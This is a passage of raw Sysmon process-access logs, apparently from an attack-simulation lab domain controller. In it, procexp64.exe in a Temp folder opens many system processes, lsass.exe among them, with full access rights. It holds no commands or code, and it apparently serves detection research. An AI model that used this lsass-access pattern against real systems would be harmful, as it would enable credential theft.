Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 